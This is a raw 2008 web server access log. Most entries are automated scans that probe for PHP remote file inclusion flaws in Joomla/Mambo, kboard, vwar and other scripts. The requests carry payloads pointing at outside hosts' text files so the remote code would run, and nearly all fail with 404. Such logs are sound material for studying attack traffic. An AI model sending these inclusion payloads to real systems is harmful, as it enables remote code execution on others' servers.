213.247.43.5 - - [04/Nov/2008:09:54:20 -0800] "GET /com_expose&Itemid=//////////?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:54:20 -0800] "GET /logs//com_expose&Itemid=//////////?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:54:40 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:55:02 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:55:03 -0800] "GET /logs/access_080303.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:55:05 -0800] "GET /logs/access_080418.log//com_expose&Itemid=//////////?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:55:09 -0800] "GET /logs/access_080111.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:55:21 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:55:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:55:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:55:22 -0800] "GET /logs/access_080303.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:09:55:30 -0800] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:55:32 -0800] "GET /logs/access_080320.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:55:40 -0800] "GET /logs/access_080726.log/index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:55:40 -0800] "GET /logs/access_080726.log/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:09:56:06 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:09:56:06 -0800] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:09:56:06 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:09:56:11 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:56:39 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:56:39 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:56:39 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:56:46 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:56:55 -0800] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:57:21 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:34 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:38 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:57:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:57:45 -0800] "GET /logs/access_080303.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:57:46 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:57:46 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:57:46 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:09:57:57 -0800] "GET /bikes/dteel/2008_07_05/?M=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.21.68.20 - - [04/Nov/2008:09:57:58 -0800] "GET /logs/access_080408.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.21.68.20 - - [04/Nov/2008:09:58:02 -0800] "GET /logs/access_080211.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:09:58:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:09:58:35 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:58:46 -0800] "GET /logs/scripts.log//tools/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:58:46 -0800] "GET /tools/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:58:46 -0800] "GET /logs//tools/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:09:59:45 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:09:59:45 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:59:47 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:59:48 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:09:59:54 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:10:00:12 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:00:21 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:00:21 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:00:35 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.105.213 - - [04/Nov/2008:10:00:51 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.38.105.213 - - [04/Nov/2008:10:00:51 -0800] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:02:40 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:02:40 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:02:40 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:02:52 -0800] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:10:02:53 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:03:14 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:03:16 -0800] "GET /logs/access_080112.log HTTP/1.0" 200 749755 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:10:03:37 -0800] "GET /errors.php?error=http://www.documenta.eti.br/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:10:03:37 -0800] "GET /logs/errors.php?error=http://www.documenta.eti.br/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:03:49 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:03:49 -0800] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:03:49 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:10:04:05 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:09 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.73.133.74 - - [04/Nov/2008:10:04:14 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://passion-voyage.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:10:04:14 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.73.133.74 - - [04/Nov/2008:10:04:14 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://passion-voyage.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.133.74 - - [04/Nov/2008:10:04:15 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://passion-voyage.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:10:04:15 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:15 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:10:04:35 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:35 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:35 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:35 -0800] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:10:04:38 -0800] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:04:58 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.73.133.74 - - [04/Nov/2008:10:05:20 -0800] "GET /logs/access_080731.log//faqsupport/samplefaqsupport.php?path[docroot]=http://passion-voyage.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:06:01 -0800] "GET /bikes/dteel/2008_02_07/?S=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:10:06:09 -0800] "GET /logs/access_080216.log//com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:10:06:10 -0800] "GET /com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:10:06:10 -0800] "GET /logs//com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:06:31 -0800] "GET /bikes/dteel/2008_02_08/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:10:06:37 -0800] "GET /logs/access_080418.log//com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:10:07:04 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:07:17 -0800] "GET /bikes/dteel/WeSTOC08/ HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:07:22 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:07:27 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:10:07:36 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:10:07:43 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.31 - - [04/Nov/2008:10:08:07 -0800] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:10:08:24 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:10:08:24 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:09:06 -0800] "GET /logs/access_080909.log HTTP/1.0" 200 4513731 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:09:17 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:09:17 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:09:31 -0800] "GET /logs/access_071226.log//tiny_includes/config.php?dir_ws=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:09:32 -0800] "GET /logs/access_080507.log//tiny_includes/config.php?dir_ws=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:10:09:46 -0800] "GET /errors.php?error=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:10:09:46 -0800] "GET /logs/errors.php?error=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:09:48 -0800] "GET /logs/access_071220.log HTTP/1.0" 200 140699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:10:09:50 -0800] "GET /logs/access_080725.log/errors.php?error=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:10:09:59 -0800] "GET /logs/access_080723.log/errors.php?error=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
